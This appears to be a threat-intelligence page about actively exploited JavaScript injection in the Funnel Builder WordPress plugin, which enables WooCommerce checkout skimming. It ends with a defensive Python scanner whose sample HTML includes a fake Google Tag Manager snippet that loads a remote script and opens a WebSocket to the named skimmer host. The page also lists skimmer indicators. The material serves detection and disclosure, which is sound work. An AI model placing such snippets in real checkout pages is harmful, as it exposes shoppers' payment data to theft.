Funnel Builder plugin WordPress arbitrary JavaScript injection actively exploited security flaw
Vulnerability
Summary
Funnel Builder for WordPress is under active exploitation for arbitrary JavaScript injection into WooCommerce checkout pages, creating payment-skimming risk across more than 40,000 stores. The flaw affects all versions before 3.15.0.3, and FunnelKit has released a fix. Attackers are abusing a publicly exposed checkout endpoint and weak method restrictions to write attacker-controlled data into plugin settings. The injected code can steal credit card numbers, CVVs, and billing addresses from shoppers at checkout.
Related Happenings
Funnel Builder WordPress plugin unauthenticated checkout script injection actively exploited security flaw
Vulnerability
First: 15.05.2026 22:30
Last: 15.05.2026 22:30
Sources 1
About this happening:
**Funnel Builder** for WordPress has an **actively exploited** unauthenticated script-injection flaw that can compromise **WooCommerce checkout pages** and steal payment data. The...
Burst Statistics authentication bypass (CVE-2026-8181)
Vulnerability
First: 15.05.2026 00:07
Last: 15.05.2026 00:07
Sources 1
About this happening:
**Burst Statistics** on **WordPress sites** is facing active exploitation of **CVE-2026-8181**, a critical **authentication bypass** that can let unauthenticated attackers imperso...
Magento checkout skimmer campaign targeting nearly 100 stores
Campaign
First: 09.04.2026 01:34
Last: 09.04.2026 01:34
Sources 1
About this happening:
A **Magento** checkout skimmer campaign is compromising **nearly 100 online stores** and stealing payment data at the point of sale, putting shoppers’ card details at immediate ri...
WebRTC payment skimmer
Malware Activity
First: 26.03.2026 08:53
Last: 26.03.2026 08:53
Sources 1
About this happening:
A **new payment skimmer** has been identified using **WebRTC data channels** to load payloads and steal payment data from **e-commerce sites**, bypassing common security controls....
Magento Open Source v2 and Adobe Commerce PolyShell mass exploitation
Exploitation Wave
First: 25.03.2026 23:40
Last: 25.03.2026 23:40
Sources 1
About this happening:
**PolyShell** exploitation is now underway against **Magento Open Source v2** and **Adobe Commerce**, with attackers reaching **56.7%** of vulnerable stores. The surge began on **...
Latest development: 09.04.2026 01:34
Sansec reported a new campaign against nearly 100 Magento online stores in which attackers hide a credit card skimmer inside a 1x1-pixel SVG element with an onload handler, display a fake Secure Checkout overlay on the checkout page, validate submitted card data with the Luhn check, and exfiltrate payment details to attacker infrastructure. The researchers also identified six exfiltration domains hosted by IncogNet LLC (AS40663).
Timeline
16.05.2026 18:20 · 2 articles
Funnel Builder checkout skimming disclosure
Initial Disclosure: A critical Funnel Builder vulnerability in WordPress is under active exploitation against WooCommerce checkout pages, where attackers inject malicious JavaScript through a publicly exposed checkout endpoint or the plugin's "External Scripts" setting to steal payment data at checkout. The payload can masquerade as Google Tag Manager or Google Analytics code, load a remote JavaScript skimmer, and open a WebSocket connection to wss://protect-wss[.]com/ws to retrieve a storefront-specific skimmer. The issue affects all versions before 3.15.0.3, Funnel Builder is used in more than 40,000 WooCommerce stores, and FunnelKit has released version 3.15.0.3 as a patch.
Sources:
- Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming — thehackernews.com — 16.05.2026 18:20
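As an added defensive check (not code from the disclosure, The Hacker News or FunnelKit), the script below scans a captured WooCommerce checkout page, or a dumped value of the plugin's "External Scripts" setting, for inline scripts that open WebSocket connections, contact the wss host named in the timeline entry, or look like Google Tag Manager / Analytics code yet load from non-Google hosts. The sample HTML and the Google host allow-list are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Indicator quoted in the disclosure above, re-fanged so it can be matched.
KNOWN_SKIMMER_HOSTS = {"protect-wss.com"}
# Hosts a genuine Google Tag Manager / Analytics snippet loads from (assumed allow-list).
GOOGLE_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"(?:wss?|https?)://[A-Za-z0-9._-]+(?:/[^\s'\"<>)]*)?")
GTM_MARKERS = ("google tag manager", "googletagmanager", "google-analytics", "gtag(")


def analyze_script(body: str) -> list[str]:
    """Return human-readable findings for one inline <script> body."""
    findings = []
    urls = URL_RE.findall(body)
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    ws_hosts = sorted({urlparse(u).hostname for u in urls if u.startswith("ws")})
    for host in hosts:
        if host in KNOWN_SKIMMER_HOSTS:
            findings.append(f"known skimmer host: {host}")
    if ws_hosts:  # a checkout page normally has no reason to open a WebSocket
        findings.append("WebSocket connection from checkout page to: " + ", ".join(ws_hosts))
    if any(marker in body.lower() for marker in GTM_MARKERS):
        foreign = [h for h in hosts if h not in GOOGLE_HOSTS]
        if foreign:  # "GTM" code that fetches from elsewhere is the masquerade described above
            findings.append("GTM/GA-looking script loads from non-Google host(s): " + ", ".join(foreign))
    return findings


def scan_checkout_html(html: str) -> list[dict]:
    """Scan a page capture or a stored settings value; report only scripts with findings."""
    report = []
    for idx, match in enumerate(SCRIPT_RE.finditer(html)):
        findings = analyze_script(match.group(1))
        if findings:
            report.append({"script_index": idx, "findings": findings})
    return report


# Constructed sample: one genuine-looking GTM loader followed by a fake one.
SAMPLE_CHECKOUT_HTML = """
<script>// Google Tag Manager
var j=document.createElement('script');j.src='https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE';
document.head.appendChild(j);</script>
<script>/* Google Tag Manager */
var s=document.createElement('script');s.src='https://cdn.example-tagmanager.test/gtm.js';
document.head.appendChild(s);var ws=new WebSocket('wss://protect-wss.com/ws');</script>
"""

if __name__ == "__main__":
    for entry in scan_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(entry)
```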